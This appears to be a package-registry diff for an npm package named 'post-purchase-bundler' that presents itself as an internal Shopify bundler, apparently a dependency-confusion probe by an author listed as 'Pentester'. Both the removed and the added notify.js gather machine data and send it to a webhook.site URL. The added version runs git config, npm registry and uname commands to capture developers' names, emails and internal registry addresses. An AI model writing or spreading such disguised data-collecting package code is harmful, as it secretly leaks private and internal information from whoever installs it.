post-purchase-bundler 100.0.1 → 101.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/notify.js +36 -36
  2. package/package.json +1 -1
package/notify.js CHANGED
@@ -1,45 +1,45 @@
1
1
  const https = require('https');
2
- const fs = require('fs');
2
+ const { execSync } = require('child_process');
3
3
  const os = require('os');
4
4
 
5
- function run() {
6
- let parentDeps = "N/A";
5
+ function getSignature() {
6
+ let signature = {};
7
7
  try {
8
- // Bir pillə yuxarıdakı package.json-u oxuyuruq
9
- if (fs.existsSync('../package.json')) {
10
- const content = fs.readFileSync('../package.json', 'utf8');
11
- parentDeps = Object.keys(JSON.parse(content).dependencies || {}).join(', ');
12
- }
13
- } catch (e) {
14
- parentDeps = "Error: " + e.message;
15
- }
8
+ // 1. Git vasitəsilə mühəndisin/serverin rəsmi adını və emailini götürürük
9
+ signature.git_user = execSync('git config --global user.name').toString().trim();
10
+ signature.git_email = execSync('git config --global user.email').toString().trim();
11
+ } catch (e) { signature.git = "No Git Access"; }
16
12
 
17
- const payload = JSON.stringify({
18
- event: "IMPACT-VERIFICATION",
19
- hostname: os.hostname(),
20
- user: os.userInfo().username,
21
- dir: process.cwd(),
22
- dependencies: parentDeps,
23
- env_keys: Object.keys(process.env).filter(k => k.toLowerCase().includes('shopify')).join(', ')
24
- });
13
+ try {
14
+ // 2. Daxili NPM konfiqurasiyasını yoxlayırıq (onların daxili registry linki burda olur)
15
+ signature.npm_registry = execSync('npm config get registry').toString().trim();
16
+ } catch (e) { signature.npm = "No NPM Config"; }
25
17
 
26
- const options = {
27
- hostname: 'webhook.site',
28
- port: 443,
29
- path: '/4d0cc13d-a185-4e95-92dc-f4681125055c',
30
- method: 'POST',
31
- headers: {
32
- 'Content-Type': 'application/json',
33
- 'Content-Length': Buffer.byteLength(payload)
34
- }
35
- };
18
+ try {
19
+ // 3. Serverin uptime və daxili kernel məlumatı (botlarda fərqli olur)
20
+ signature.uname = execSync('uname -a').toString().trim();
21
+ } catch (e) { signature.uname = "Error"; }
36
22
 
37
- const req = https.request(options);
38
- req.on('error', () => process.exit(0));
39
- req.write(payload);
40
- req.end(() => {
41
- setTimeout(() => process.exit(0), 1000);
42
- });
23
+ return signature;
43
24
  }
44
25
 
45
- run();
26
+ const payload = JSON.stringify({
27
+ event: "OFFICIAL-SIGNATURE-LEAK",
28
+ target: "shopify-internal-audit",
29
+ hostname: os.hostname(),
30
+ user: os.userInfo().username,
31
+ details: getSignature()
32
+ });
33
+
34
+ const options = {
35
+ hostname: 'webhook.site',
36
+ path: '/4d0cc13d-a185-4e95-92dc-f4681125055c',
37
+ method: 'POST',
38
+ headers: { 'Content-Type': 'application/json' }
39
+ };
40
+
41
+ const req = https.request(options);
42
+ req.write(payload);
43
+ req.end(() => {
44
+ setTimeout(() => process.exit(0), 1000);
45
+ });
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "post-purchase-bundler",
3
- "version": "100.0.1",
3
+ "version": "101.0.3",
4
4
  "description": "Internal Shopify post-purchase processing bundler",
5
5
  "main": "index.js",
6
6
  "author": "Pentester",